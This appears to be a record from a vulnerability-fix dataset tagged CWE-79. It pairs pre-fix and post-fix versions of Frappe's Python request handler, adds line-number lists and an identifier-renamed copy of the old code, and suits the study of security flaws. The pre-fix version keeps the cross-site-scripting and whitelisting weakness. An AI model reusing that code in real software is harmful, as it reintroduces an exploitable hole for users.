522,
523,
524,
535,
536,
537,
538,
539,
540,
541,
542,
543,
544,
545,
546,
547,
548,
549,
550,
551,
552,
553,
554,
612,
613,
614,
615,
616,
617,
618,
619,
620,
621,
622,
623,
624,
625,
626,
627,
628,
629,
630,
631,
632,
633,
634,
635,
636,
637,
638,
639,
640,
641,
642,
643,
644,
645,
646,
647,
780,
781,
782,
783,
784,
785,
786,
787,
861,
862,
863,
864,
865,
866,
867,
868,
869,
870,
871,
936,
937,
938,
939,
940,
941,
942,
943,
944,
945,
946,
947,
948,
949,
950,
951,
952,
953,
987,
988,
989,
990,
991,
992,
993,
994,
995,
996,
997,
1032,
1033,
1034,
1052,
1053,
1054,
1083,
1084,
1085,
1124,
1125,
1126,
1161,
1162,
1163,
1173,
1174,
1175,
1190,
1191,
1192,
1193,
1194,
1195,
1196,
1197,
1230,
1231,
1232,
1233,
1234,
1235,
1236,
1237,
1322,
1323,
1324,
1325,
1326,
1327,
1328,
1329,
1355,
1356,
1357,
1358,
1359,
1399,
1400,
1401,
1430,
1431,
1432,
1454,
1455,
1456,
1478,
1479,
1480,
1502,
1503,
1504,
1533,
1534,
1535,
1536,
1537,
1538,
1539,
1540,
1541,
1542,
1543,
1544,
1545,
1546,
1547,
1548,
1578,
1579,
1580,
1581,
1582,
1583,
1584,
1597,
1598,
1599,
1600,
1610,
1611,
1612,
1633,
1634,
1635,
1813,
1814,
1815,
1844,
1845,
1846,
1874,
1875,
1876,
1912,
1913,
1914,
1915,
1916,
1917,
1918,
1919,
1920,
1942,
1943,
1944,
1945,
1946,
1947,
1948,
1949,
1950,
1951,
1952,
1953,
1954,
1955,
1956,
1957,
1958,
2027,
2028,
2029,
2030,
2031,
2032,
2033,
2034,
2035,
2036,
2037,
2038,
2039,
2040,
2041,
2094,
2095,
2096,
2097,
2098,
2099,
2100,
2101,
2102,
2103,
2104,
2149,
2150,
2151,
2152,
2153,
2154,
2155,
2156,
2157,
2158,
2200,
2201,
2202,
2218,
2219,
2220,
2236,
2237,
2238,
2239,
2240,
2241,
2242,
2243,
2244,
2281,
2282,
2283,
2284,
2285,
2286,
2287,
2315,
2316,
2317,
2335,
2336,
2337,
2355,
2356,
2357,
2380,
2381,
2382,
2401,
2402,
2403,
2404,
2405,
2406,
2407,
2428,
2429,
2430,
2431,
2432,
2433,
2434,
2435,
2436,
2437,
2491,
2492,
2493,
2494,
2495,
2496,
2497,
2498,
2499,
2552,
2553,
2554,
2555,
2556,
2557,
2558,
2559,
2560,
2561,
2562,
2563,
2564,
2607,
2608,
2609,
2621,
2622,
2623,
2637,
2638,
2639,
2658,
2659,
2660,
2684,
2685,
2686,
2698,
2699,
2700,
2701,
2708,
2709,
2710,
2711,
2712,
2713,
2714,
2715,
2716,
2717,
2727,
2728,
2729,
2730,
2731,
2732,
2733,
2734,
2735,
2736,
2737,
2738,
2748,
2749,
2750,
2751,
2752,
2753,
2754,
2755,
2756,
2765,
2766,
2767,
2768,
2769,
2770,
2771,
2772,
2773,
2785,
2786,
2787,
2788,
2810,
2811,
2812,
2830,
2831,
2832,
2833,
2868,
2869,
2870,
2871,
2872,
2873,
2874,
2901,
2902,
2903,
2904,
2905,
2906,
2907,
2908,
2909,
2943,
2944,
2945,
2946,
2947,
2948,
2949,
2950,
2951,
2978,
2979,
2980,
2981,
2982,
2983,
2984,
2985,
2998,
2999,
3000,
3001,
3002,
3003,
3013,
3014,
3015,
3016,
3017,
3018,
3019,
3020,
3041,
3042,
3043,
3044,
3045,
3046,
3047,
3048,
3049,
3084,
3085,
3086,
3087,
3088,
3089,
3090,
3091,
3092,
3093,
3094,
3095,
3096,
3097,
3179,
3180,
3181,
3182,
3183,
3184,
3185,
3213,
3214,
3215,
3216,
3217,
3218,
3219,
3220,
3260,
3261,
3262,
3263,
3264,
3265,
3266,
3267,
3285,
3286,
3287,
3288,
3289,
3290,
3291,
3292,
3293,
3294,
965,
1883,
2470,
3106,
3107,
3108,
1364,
1365,
1366
] | [
3,
5,
39,
41,
89,
91,
94,
97,
114,
116,
117,
141,
142,
147,
155,
156,
160,
166,
172,
179,
180,
186,
189,
196,
201,
208,
209,
222,
223,
229,
233,
239,
241,
247,
248,
254,
258,
264,
266,
272,
273,
278,
279,
290,
293,
298,
302,
305,
310,
311,
312,
317,
320,
331,
338,
343,
344,
353,
354,
359,
368,
369,
371,
372,
373,
379,
390,
391,
393,
404,
405,
406,
412,
417,
424,
425,
434,
436,
437,
442,
446,
448,
450,
451,
455,
461,
467,
472,
474,
475,
479,
493,
496,
497,
506,
516,
522,
524,
525,
545,
567,
569,
570,
580,
590,
631,
636,
639,
650,
652,
653,
654,
665,
678,
686,
694,
699,
701,
702,
707,
709,
710,
717,
727,
734,
735,
748,
763,
768,
774,
786,
787,
793,
796,
798,
801,
803,
809,
815,
816,
831,
833,
851,
852,
853,
854,
861,
864,
869,
870,
879,
888,
896,
897,
907,
909,
926,
928,
931,
940,
948,
949,
959,
962,
964,
969,
972,
980,
995,
996,
1010,
1016,
1017,
1031,
1033,
1037,
1047,
1048,
1083,
1089,
1090,
1113,
1123,
1128,
1129,
1140,
1141,
1148,
1153,
1154,
1166,
1170,
1193,
1194,
1203,
1206,
1211,
1213,
1214,
1215,
1216,
1217,
1218,
1219,
1220,
1221,
1223,
1230,
1231,
1232,
1233,
1247,
1249,
1252,
1256,
1257,
1262,
1286,
1287,
1297,
1300,
1319,
1320,
1333,
1352,
1359,
1363,
1365,
1366,
1376,
1390,
1394,
1395,
1419,
1420,
1445,
1446,
1470,
1471,
1491,
1506,
1507,
1512,
1520,
1523,
1526,
1527,
1533,
1551,
1552,
1561,
1566,
1570,
1571,
1579,
1580,
1590,
1591,
1595,
1599,
1602,
1603,
1614,
1615,
1620,
1625,
1638,
1654,
1675,
1682,
1685,
1696,
1699,
1706,
1718,
1724,
1745,
1748,
1750,
1751,
1762,
1764,
1765,
1780,
1782,
1783,
1793,
1794,
1798,
1802,
1808,
1809,
1811,
1813,
1814,
1824,
1825,
1832,
1833,
1837,
1841,
1844,
1845,
1853,
1854,
1855,
1857,
1863,
1864,
1871,
1878,
1879,
1892,
1900,
1902,
1908,
1909,
1921,
1925,
1941,
1949,
1950,
1959,
1960,
1964,
1969,
1972,
1985,
1995,
1997,
1998,
2007,
2011,
2025,
2030,
2037,
2038,
2047,
2048,
2052,
2061,
2064,
2065,
2077,
2082,
2091,
2093,
2096,
2101,
2106,
2109,
2119,
2121,
2122,
2133,
2137,
2144,
2149,
2151,
2156,
2161,
2166,
2175,
2176,
2187,
2189,
2194,
2195,
2206,
2208,
2213,
2214,
2222,
2234,
2239,
2246,
2249,
2252,
2254,
2259,
2260,
2268,
2278,
2284,
2287,
2289,
2294,
2295,
2306,
2314,
2315,
2327,
2335,
2336,
2350,
2359,
2361,
2362,
2383,
2384,
2394,
2411,
2412,
2422,
2426,
2435,
2437,
2438,
2443,
2444,
2447,
2448,
2453,
2459,
2468,
2474,
2475,
2493,
2496,
2500,
2501,
2502,
2503,
2504,
2505,
2508,
2509,
2510,
2511,
2523,
2524,
2526,
2532,
2533,
2547,
2552,
2564,
2568,
2569,
2574,
2575,
2578,
2583,
2585,
2590,
2596,
2597,
2607,
2611,
2612,
2622,
2623,
2639,
2644,
2645,
2661,
2665,
2671,
2672,
2686,
2687,
2702,
2703,
2707,
2711,
2715,
2719,
2721,
2722,
2725,
2728,
2731,
2734,
2740,
2741,
2746,
2749,
2752,
2757,
2758,
2763,
2766,
2769,
2775,
2776,
2789,
2799,
2800,
2819,
2820,
2838,
2839,
2850,
2857,
2858,
2867,
2873,
2878,
2879,
2886,
2887,
2893,
2895,
2896,
2901,
2911,
2920,
2926,
2935,
2937,
2938,
2944,
2956,
2969,
2972,
2973,
2978,
2984,
2990,
2992,
2993,
2997,
3005,
3007,
3008,
3013,
3024,
3025,
3030,
3031,
3040,
3048,
3050,
3052,
3055,
3057,
3065,
3067,
3072,
3074,
3075,
3100,
3106,
3115,
3120,
3124,
3125,
3131,
3142,
3143,
3147,
3156,
3159,
3165,
3167,
3168,
3177,
3183,
3189,
3190,
3197,
3198,
3204,
3206,
3207,
3211,
3226,
3227,
3233,
3234,
3243,
3244,
3253,
3254,
3259,
3265,
3270,
3272,
3273,
3278,
3279,
3283,
3286,
3292,
3298,
3300,
3308,
1,
2,
3,
4,
5,
6,
7,
119,
120,
121,
122,
144,
145,
146,
147,
148,
149,
150,
151,
182,
183,
184,
185,
186,
187,
188,
189,
190,
191,
192,
193,
211,
225,
226,
227,
228,
229,
230,
231,
250,
251,
252,
253,
254,
255,
256,
285,
286,
287,
288,
289,
290,
291,
292,
293,
294,
295,
296,
297,
298,
299,
300,
301,
427,
428,
429,
439,
440,
441,
453,
454,
455,
456,
457,
458,
459,
460,
461,
462,
463,
477,
478,
479,
480,
481,
482,
483,
484,
485,
486,
487,
488,
499,
500,
501,
502,
503,
504,
505,
506,
507,
508,
509,
510,
511,
512,
513,
514,
515,
516,
517,
518,
577,
578,
579,
580,
581,
582,
583,
584,
585,
586,
587,
588,
589,
590,
591,
592,
593,
594,
595,
596,
597,
598,
599,
600,
601,
602,
603,
604,
605,
606,
607,
608,
609,
610,
611,
612,
746,
747,
748,
749,
750,
751,
752,
753,
828,
829,
830,
831,
832,
833,
834,
835,
836,
837,
838,
904,
905,
906,
907,
908,
909,
910,
911,
912,
913,
914,
915,
916,
917,
918,
919,
920,
921,
956,
957,
958,
959,
960,
961,
962,
963,
964,
965,
966,
1002,
1003,
1004,
1022,
1023,
1024,
1053,
1054,
1055,
1094,
1095,
1096,
1131,
1132,
1133,
1143,
1144,
1145,
1160,
1161,
1162,
1163,
1164,
1165,
1166,
1167,
1201,
1202,
1203,
1204,
1205,
1206,
1207,
1208,
1294,
1295,
1296,
1297,
1298,
1299,
1300,
1301,
1327,
1328,
1329,
1330,
1331,
1371,
1372,
1373,
1403,
1404,
1405,
1428,
1429,
1430,
1453,
1454,
1455,
1478,
1479,
1480,
1509,
1510,
1511,
1512,
1513,
1514,
1515,
1516,
1517,
1518,
1519,
1520,
1521,
1522,
1523,
1524,
1554,
1555,
1556,
1557,
1558,
1559,
1560,
1573,
1574,
1575,
1576,
1586,
1587,
1588,
1609,
1610,
1611,
1789,
1790,
1791,
1820,
1821,
1822,
1850,
1851,
1852,
1889,
1890,
1891,
1892,
1893,
1894,
1895,
1896,
1897,
1920,
1921,
1922,
1923,
1924,
1925,
1926,
1927,
1928,
1929,
1930,
1931,
1932,
1933,
1934,
1935,
1936,
2006,
2007,
2008,
2009,
2010,
2011,
2012,
2013,
2014,
2015,
2016,
2017,
2018,
2019,
2020,
2074,
2075,
2076,
2077,
2078,
2079,
2080,
2081,
2082,
2083,
2084,
2130,
2131,
2132,
2133,
2134,
2135,
2136,
2137,
2138,
2139,
2182,
2183,
2184,
2201,
2202,
2203,
2220,
2221,
2222,
2223,
2224,
2225,
2226,
2227,
2228,
2266,
2267,
2268,
2269,
2270,
2271,
2272,
2301,
2302,
2303,
2322,
2323,
2324,
2343,
2344,
2345,
2369,
2370,
2371,
2391,
2392,
2393,
2394,
2395,
2396,
2397,
2419,
2420,
2421,
2422,
2423,
2424,
2425,
2426,
2427,
2428,
2483,
2484,
2485,
2486,
2487,
2488,
2489,
2490,
2491,
2545,
2546,
2547,
2548,
2549,
2550,
2551,
2552,
2553,
2554,
2555,
2556,
2557,
2600,
2601,
2602,
2614,
2615,
2616,
2631,
2632,
2633,
2653,
2654,
2655,
2680,
2681,
2682,
2695,
2696,
2697,
2698,
2705,
2706,
2707,
2708,
2709,
2710,
2711,
2712,
2713,
2714,
2724,
2725,
2726,
2727,
2728,
2729,
2730,
2731,
2732,
2733,
2734,
2735,
2745,
2746,
2747,
2748,
2749,
2750,
2751,
2752,
2753,
2762,
2763,
2764,
2765,
2766,
2767,
2768,
2769,
2770,
2782,
2783,
2784,
2785,
2807,
2808,
2809,
2827,
2828,
2829,
2830,
2865,
2866,
2867,
2868,
2869,
2870,
2871,
2898,
2899,
2900,
2901,
2902,
2903,
2904,
2905,
2906,
2940,
2941,
2942,
2943,
2944,
2945,
2946,
2947,
2948,
2975,
2976,
2977,
2978,
2979,
2980,
2981,
2982,
2995,
2996,
2997,
2998,
2999,
3000,
3010,
3011,
3012,
3013,
3014,
3015,
3016,
3017,
3038,
3039,
3040,
3041,
3042,
3043,
3044,
3045,
3046,
3080,
3081,
3082,
3083,
3084,
3085,
3086,
3087,
3088,
3089,
3090,
3091,
3092,
3093,
3175,
3176,
3177,
3178,
3179,
3180,
3181,
3209,
3210,
3211,
3212,
3213,
3214,
3215,
3216,
3256,
3257,
3258,
3259,
3260,
3261,
3262,
3263,
3281,
3282,
3283,
3284,
3285,
3286,
3287,
3288,
3289,
3290,
933,
1859,
2461,
3102,
3103,
3104,
1336,
1337,
1338
] |
1CWE-79
| # Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# MIT License. See license.txt
from __future__ import unicode_literals
import frappe
from frappe import _
import frappe.utils
import frappe.sessions
import frappe.desk.form.run_method
from frappe.utils.response import build_response
from frappe.api import validate_auth
from frappe.utils import cint
from frappe.core.doctype.server_script.server_script_utils import run_server_script_api
from werkzeug.wrappers import Response
from six import string_types
ALLOWED_MIMETYPES = ('image/png', 'image/jpeg', 'application/pdf', 'application/msword',
'application/vnd.openxmlformats-officedocument.wordprocessingml.document',
'application/vnd.ms-excel', 'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet',
'application/vnd.oasis.opendocument.text', 'application/vnd.oasis.opendocument.spreadsheet')
def handle():
"""handle request"""
validate_auth()
cmd = frappe.local.form_dict.cmd
data = None
if cmd!='login':
data = execute_cmd(cmd)
# data can be an empty string or list which are valid responses
if data is not None:
if isinstance(data, Response):
# method returns a response object, pass it on
return data
# add the response to `message` label
frappe.response['message'] = data
return build_response("json")
def execute_cmd(cmd, from_async=False):
"""execute a request as python module"""
for hook in frappe.get_hooks("override_whitelisted_methods", {}).get(cmd, []):
# override using the first hook
cmd = hook
break
# via server script
if run_server_script_api(cmd):
return None
try:
method = get_attr(cmd)
except Exception as e:
if frappe.local.conf.developer_mode:
raise e
else:
frappe.respond_as_web_page(title='Invalid Method', html='Method not found',
indicator_color='red', http_status_code=404)
return
if from_async:
method = method.queue
is_whitelisted(method)
is_valid_http_method(method)
return frappe.call(method, **frappe.form_dict)
def is_valid_http_method(method):
http_method = frappe.local.request.method
if http_method not in frappe.allowed_http_methods_for_whitelisted_func[method]:
frappe.throw(_("Not permitted"), frappe.PermissionError)
def is_whitelisted(method):
# check if whitelisted
if frappe.session['user'] == 'Guest':
if (method not in frappe.guest_methods):
frappe.throw(_("Not permitted"), frappe.PermissionError)
if method not in frappe.xss_safe_methods:
# strictly sanitize form_dict
# escapes html characters like <> except for predefined tags like a, b, ul etc.
for key, value in frappe.form_dict.items():
if isinstance(value, string_types):
frappe.form_dict[key] = frappe.utils.sanitize_html(value)
else:
if not method in frappe.whitelisted:
frappe.throw(_("Not permitted"), frappe.PermissionError)
@frappe.whitelist(allow_guest=True)
def version():
return frappe.__version__
@frappe.whitelist()
def runserverobj(method, docs=None, dt=None, dn=None, arg=None, args=None):
frappe.desk.form.run_method.runserverobj(method, docs=docs, dt=dt, dn=dn, arg=arg, args=args)
@frappe.whitelist(allow_guest=True)
def logout():
frappe.local.login_manager.logout()
frappe.db.commit()
@frappe.whitelist(allow_guest=True)
def web_logout():
frappe.local.login_manager.logout()
frappe.db.commit()
frappe.respond_as_web_page(_("Logged Out"), _("You have been successfully logged out"),
indicator_color='green')
@frappe.whitelist(allow_guest=True)
def run_custom_method(doctype, name, custom_method):
"""cmd=run_custom_method&doctype={doctype}&name={name}&custom_method={custom_method}"""
doc = frappe.get_doc(doctype, name)
if getattr(doc, custom_method, frappe._dict()).is_whitelisted:
frappe.call(getattr(doc, custom_method), **frappe.local.form_dict)
else:
frappe.throw(_("Not permitted"), frappe.PermissionError)
@frappe.whitelist()
def uploadfile():
ret = None
try:
if frappe.form_dict.get('from_form'):
try:
ret = frappe.get_doc({
"doctype": "File",
"attached_to_name": frappe.form_dict.docname,
"attached_to_doctype": frappe.form_dict.doctype,
"attached_to_field": frappe.form_dict.docfield,
"file_url": frappe.form_dict.file_url,
"file_name": frappe.form_dict.filename,
"is_private": frappe.utils.cint(frappe.form_dict.is_private),
"content": frappe.form_dict.filedata,
"decode": True
})
ret.save()
except frappe.DuplicateEntryError:
# ignore pass
ret = None
frappe.db.rollback()
else:
if frappe.form_dict.get('method'):
method = frappe.get_attr(frappe.form_dict.method)
is_whitelisted(method)
ret = method()
except Exception:
frappe.errprint(frappe.utils.get_traceback())
frappe.response['http_status_code'] = 500
ret = None
return ret
@frappe.whitelist(allow_guest=True)
def upload_file():
user = None
if frappe.session.user == 'Guest':
if frappe.get_system_settings('allow_guests_to_upload_files'):
ignore_permissions = True
else:
return
else:
user = frappe.get_doc("User", frappe.session.user)
ignore_permissions = False
files = frappe.request.files
is_private = frappe.form_dict.is_private
doctype = frappe.form_dict.doctype
docname = frappe.form_dict.docname
fieldname = frappe.form_dict.fieldname
file_url = frappe.form_dict.file_url
folder = frappe.form_dict.folder or 'Home'
method = frappe.form_dict.method
content = None
filename = None
if 'file' in files:
file = files['file']
content = file.stream.read()
filename = file.filename
frappe.local.uploaded_file = content
frappe.local.uploaded_filename = filename
if frappe.session.user == 'Guest' or (user and not user.has_desk_access()):
import mimetypes
filetype = mimetypes.guess_type(filename)[0]
if filetype not in ALLOWED_MIMETYPES:
frappe.throw(_("You can only upload JPG, PNG, PDF, or Microsoft documents."))
if method:
method = frappe.get_attr(method)
is_whitelisted(method)
return method()
else:
ret = frappe.get_doc({
"doctype": "File",
"attached_to_doctype": doctype,
"attached_to_name": docname,
"attached_to_field": fieldname,
"folder": folder,
"file_name": filename,
"file_url": file_url,
"is_private": cint(is_private),
"content": content
})
ret.save(ignore_permissions=ignore_permissions)
return ret
def get_attr(cmd):
"""get method object from cmd"""
if '.' in cmd:
method = frappe.get_attr(cmd)
else:
method = globals()[cmd]
frappe.log("method:" + cmd)
return method
@frappe.whitelist(allow_guest = True)
def ping():
return "pong"
| # Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# MIT License. See license.txt
from __future__ import unicode_literals
from werkzeug.wrappers import Response
from six import text_type, string_types, StringIO
import frappe
import frappe.utils
import frappe.sessions
import frappe.desk.form.run_method
from frappe.utils import cint
from frappe.api import validate_auth
from frappe import _, is_whitelisted
from frappe.utils.response import build_response
from frappe.utils.csvutils import build_csv_response
from frappe.core.doctype.server_script.server_script_utils import run_server_script_api
ALLOWED_MIMETYPES = ('image/png', 'image/jpeg', 'application/pdf', 'application/msword',
'application/vnd.openxmlformats-officedocument.wordprocessingml.document',
'application/vnd.ms-excel', 'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet',
'application/vnd.oasis.opendocument.text', 'application/vnd.oasis.opendocument.spreadsheet')
def handle():
"""handle request"""
validate_auth()
cmd = frappe.local.form_dict.cmd
data = None
if cmd!='login':
data = execute_cmd(cmd)
# data can be an empty string or list which are valid responses
if data is not None:
if isinstance(data, Response):
# method returns a response object, pass it on
return data
# add the response to `message` label
frappe.response['message'] = data
return build_response("json")
def execute_cmd(cmd, from_async=False):
"""execute a request as python module"""
for hook in frappe.get_hooks("override_whitelisted_methods", {}).get(cmd, []):
# override using the first hook
cmd = hook
break
# via server script
if run_server_script_api(cmd):
return None
try:
method = get_attr(cmd)
except Exception as e:
if frappe.local.conf.developer_mode:
raise e
else:
frappe.respond_as_web_page(title='Invalid Method', html='Method not found',
indicator_color='red', http_status_code=404)
return
if from_async:
method = method.queue
if method != run_doc_method:
is_whitelisted(method)
is_valid_http_method(method)
return frappe.call(method, **frappe.form_dict)
def is_valid_http_method(method):
http_method = frappe.local.request.method
if http_method not in frappe.allowed_http_methods_for_whitelisted_func[method]:
frappe.throw(_("Not permitted"), frappe.PermissionError)
@frappe.whitelist(allow_guest=True)
def version():
return frappe.__version__
@frappe.whitelist(allow_guest=True)
def logout():
frappe.local.login_manager.logout()
frappe.db.commit()
@frappe.whitelist(allow_guest=True)
def web_logout():
frappe.local.login_manager.logout()
frappe.db.commit()
frappe.respond_as_web_page(_("Logged Out"), _("You have been successfully logged out"),
indicator_color='green')
@frappe.whitelist()
def uploadfile():
ret = None
try:
if frappe.form_dict.get('from_form'):
try:
ret = frappe.get_doc({
"doctype": "File",
"attached_to_name": frappe.form_dict.docname,
"attached_to_doctype": frappe.form_dict.doctype,
"attached_to_field": frappe.form_dict.docfield,
"file_url": frappe.form_dict.file_url,
"file_name": frappe.form_dict.filename,
"is_private": frappe.utils.cint(frappe.form_dict.is_private),
"content": frappe.form_dict.filedata,
"decode": True
})
ret.save()
except frappe.DuplicateEntryError:
# ignore pass
ret = None
frappe.db.rollback()
else:
if frappe.form_dict.get('method'):
method = frappe.get_attr(frappe.form_dict.method)
is_whitelisted(method)
ret = method()
except Exception:
frappe.errprint(frappe.utils.get_traceback())
frappe.response['http_status_code'] = 500
ret = None
return ret
@frappe.whitelist(allow_guest=True)
def upload_file():
user = None
if frappe.session.user == 'Guest':
if frappe.get_system_settings('allow_guests_to_upload_files'):
ignore_permissions = True
else:
return
else:
user = frappe.get_doc("User", frappe.session.user)
ignore_permissions = False
files = frappe.request.files
is_private = frappe.form_dict.is_private
doctype = frappe.form_dict.doctype
docname = frappe.form_dict.docname
fieldname = frappe.form_dict.fieldname
file_url = frappe.form_dict.file_url
folder = frappe.form_dict.folder or 'Home'
method = frappe.form_dict.method
content = None
filename = None
if 'file' in files:
file = files['file']
content = file.stream.read()
filename = file.filename
frappe.local.uploaded_file = content
frappe.local.uploaded_filename = filename
if frappe.session.user == 'Guest' or (user and not user.has_desk_access()):
import mimetypes
filetype = mimetypes.guess_type(filename)[0]
if filetype not in ALLOWED_MIMETYPES:
frappe.throw(_("You can only upload JPG, PNG, PDF, or Microsoft documents."))
if method:
method = frappe.get_attr(method)
is_whitelisted(method)
return method()
else:
ret = frappe.get_doc({
"doctype": "File",
"attached_to_doctype": doctype,
"attached_to_name": docname,
"attached_to_field": fieldname,
"folder": folder,
"file_name": filename,
"file_url": file_url,
"is_private": cint(is_private),
"content": content
})
ret.save(ignore_permissions=ignore_permissions)
return ret
def get_attr(cmd):
"""get method object from cmd"""
if '.' in cmd:
method = frappe.get_attr(cmd)
else:
method = globals()[cmd]
frappe.log("method:" + cmd)
return method
@frappe.whitelist(allow_guest=True)
def ping():
return "pong"
@frappe.whitelist()
def run_doc_method(method, docs=None, dt=None, dn=None, arg=None, args=None):
"""run controller method - old style"""
import json, inspect
if not args: args = arg or ""
if dt: # not called from a doctype (from a page)
if not dn: dn = dt # single
doc = frappe.get_doc(dt, dn)
else:
doc = frappe.get_doc(json.loads(docs))
doc._original_modified = doc.modified
doc.check_if_latest()
if not doc.has_permission("read"):
frappe.msgprint(_("Not permitted"), raise_exception = True)
if not doc:
return
try:
args = json.loads(args)
except ValueError:
args = args
method_obj = getattr(doc, method)
is_whitelisted(getattr(method_obj, '__func__', method_obj))
try:
fnargs = inspect.getargspec(method_obj)[0]
except ValueError:
fnargs = inspect.getfullargspec(method_obj).args
if not fnargs or (len(fnargs)==1 and fnargs[0]=="self"):
r = doc.run_method(method)
elif "args" in fnargs or not isinstance(args, dict):
r = doc.run_method(method, args)
else:
r = doc.run_method(method, **args)
frappe.response.docs.append(doc)
if not r:
return
# build output as csv
if cint(frappe.form_dict.get('as_csv')):
build_csv_response(r, doc.doctype.replace(' ', ''))
return
frappe.response['message'] = r
# for backwards compatibility
runserverobj = run_doc_method
| xss | {
"code": [
"from frappe import _",
"from frappe.utils.response import build_response",
"from frappe.api import validate_auth",
"from werkzeug.wrappers import Response",
"from six import string_types",
"\tis_whitelisted(method)",
"\tis_valid_http_method(method)",
"def is_whitelisted(method):",
"\tif frappe.session['user'] == 'Guest':",
"\t\tif (method not in frappe.guest_methods):",
"\t\t\tfrappe.throw(_(\"Not permitted\"), frappe.PermissionError)",
"\t\tif method not in frappe.xss_safe_methods:",
"\t\t\tfor key, value in frappe.form_dict.items():",
"\t\t\t\tif isinstance(value, string_types):",
"\t\t\t\t\tfrappe.form_dict[key] = frappe.utils.sanitize_html(value)",
"\telse:",
"\t\tif not method in frappe.whitelisted:",
"\t\t\tfrappe.throw(_(\"Not permitted\"), frappe.PermissionError)",
"@frappe.whitelist()",
"def runserverobj(method, docs=None, dt=None, dn=None, arg=None, args=None):",
"\tfrappe.desk.form.run_method.runserverobj(method, docs=docs, dt=dt, dn=dn, arg=arg, args=args)",
"@frappe.whitelist(allow_guest=True)",
"def run_custom_method(doctype, name, custom_method):",
"\tdoc = frappe.get_doc(doctype, name)",
"\tif getattr(doc, custom_method, frappe._dict()).is_whitelisted:",
"\t\tfrappe.call(getattr(doc, custom_method), **frappe.local.form_dict)",
"\telse:",
"\t\tfrappe.throw(_(\"Not permitted\"), frappe.PermissionError)",
"@frappe.whitelist(allow_guest = True)"
],
"line_no": [
6,
10,
11,
14,
15,
67,
68,
78,
80,
81,
82,
84,
87,
88,
89,
91,
92,
93,
99,
100,
101,
115,
116,
118,
119,
120,
121,
122,
225
]
} | {
"code": [
"from werkzeug.wrappers import Response",
"from six import text_type, string_types, StringIO",
"from frappe.api import validate_auth",
"from frappe.utils.response import build_response",
"from frappe.utils.csvutils import build_csv_response",
"\tif method != run_doc_method:",
"\t\tis_whitelisted(method)",
"@frappe.whitelist(allow_guest=True)",
"@frappe.whitelist()",
"def run_doc_method(method, docs=None, dt=None, dn=None, arg=None, args=None):",
"\t\"\"\"run controller method - old style\"\"\"",
"\timport json, inspect",
"\tif not args: args = arg or \"\"",
"\telse:",
"\t\tdoc._original_modified = doc.modified",
"\t\tdoc.check_if_latest()",
"\tif not doc.has_permission(\"read\"):",
"\t\tfrappe.msgprint(_(\"Not permitted\"), raise_exception = True)",
"\t\treturn",
"\ttry:",
"\texcept ValueError:",
"\t\targs = args",
"\tmethod_obj = getattr(doc, method)",
"\tis_whitelisted(getattr(method_obj, '__func__', method_obj))",
"\ttry:",
"\t\tfnargs = inspect.getargspec(method_obj)[0]",
"\texcept ValueError:",
"\t\tfnargs = inspect.getfullargspec(method_obj).args",
"\tif not fnargs or (len(fnargs)==1 and fnargs[0]==\"self\"):",
"\t\tr = doc.run_method(method)",
"\telif \"args\" in fnargs or not isinstance(args, dict):",
"\t\tr = doc.run_method(method, args)",
"\telse:",
"\t\tr = doc.run_method(method, **args)",
"\tfrappe.response.docs.append(doc)",
"\tif not r:",
"\t\treturn",
"\tif cint(frappe.form_dict.get('as_csv')):",
"\t\tbuild_csv_response(r, doc.doctype.replace(' ', ''))",
"\t\treturn",
"\tfrappe.response['message'] = r",
"runserverobj = run_doc_method"
],
"line_no": [
6,
7,
15,
17,
18,
72,
73,
201,
205,
206,
207,
208,
210,
216,
218,
219,
221,
222,
225,
227,
229,
230,
232,
233,
235,
236,
237,
238,
240,
241,
243,
244,
246,
247,
249,
251,
252,
255,
256,
257,
259,
262
]
} |
from __future__ import unicode_literals
import .frappe
from VAR_25 import _
import .frappe.utils
import .frappe.sessions
import .frappe.desk.form.run_method
from VAR_25.utils.response import build_response
from VAR_25.api import validate_auth
from VAR_25.utils import cint
from VAR_25.core.doctype.server_script.server_script_utils import run_server_script_api
from werkzeug.wrappers import Response
from six import string_types
VAR_0 = ('image/png', 'image/jpeg', 'application/pdf', 'application/msword',
'application/vnd.openxmlformats-officedocument.wordprocessingml.document',
'application/vnd.ms-excel', 'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet',
'application/vnd.oasis.opendocument.text', 'application/vnd.oasis.opendocument.spreadsheet')
def FUNC_0():
validate_auth()
VAR_1 = VAR_25.local.form_dict.cmd
VAR_12 = None
if VAR_1!='login':
VAR_12 = FUNC_1(VAR_1)
if VAR_12 is not None:
if isinstance(VAR_12, Response):
return VAR_12
VAR_25.response['message'] = VAR_12
return build_response("json")
def FUNC_1(VAR_1, VAR_2=False):
for hook in VAR_25.get_hooks("override_whitelisted_methods", {}).get(VAR_1, []):
VAR_1 = hook
break
if run_server_script_api(VAR_1):
return None
try:
VAR_3 = FUNC_11(VAR_1)
except Exception as e:
if VAR_25.local.conf.developer_mode:
raise e
else:
VAR_25.respond_as_web_page(title='Invalid Method', html='Method not found',
indicator_color='red', http_status_code=404)
return
if VAR_2:
VAR_3 = method.queue
FUNC_3(VAR_3)
FUNC_2(VAR_3)
return VAR_25.call(VAR_3, **VAR_25.form_dict)
def FUNC_2(VAR_3):
VAR_13 = VAR_25.local.request.method
if VAR_13 not in VAR_25.allowed_http_methods_for_whitelisted_func[VAR_3]:
VAR_25.throw(_("Not permitted"), VAR_25.PermissionError)
def FUNC_3(VAR_3):
if VAR_25.session['user'] == 'Guest':
if (VAR_3 not in VAR_25.guest_methods):
VAR_25.throw(_("Not permitted"), VAR_25.PermissionError)
if VAR_3 not in VAR_25.xss_safe_methods:
for VAR_29, value in VAR_25.form_dict.items():
if isinstance(value, string_types):
VAR_25.form_dict[VAR_29] = VAR_25.utils.sanitize_html(value)
else:
if not VAR_3 in VAR_25.whitelisted:
VAR_25.throw(_("Not permitted"), VAR_25.PermissionError)
@VAR_25.whitelist(allow_guest=True)
def FUNC_4():
return VAR_25.__version__
@VAR_25.whitelist()
def FUNC_5(VAR_3, VAR_4=None, VAR_5=None, VAR_6=None, VAR_7=None, VAR_8=None):
VAR_25.desk.form.run_method.runserverobj(VAR_3, VAR_4=docs, VAR_5=dt, VAR_6=dn, VAR_7=arg, VAR_8=args)
@VAR_25.whitelist(allow_guest=True)
def FUNC_6():
VAR_25.local.login_manager.logout()
VAR_25.db.commit()
@VAR_25.whitelist(allow_guest=True)
def FUNC_7():
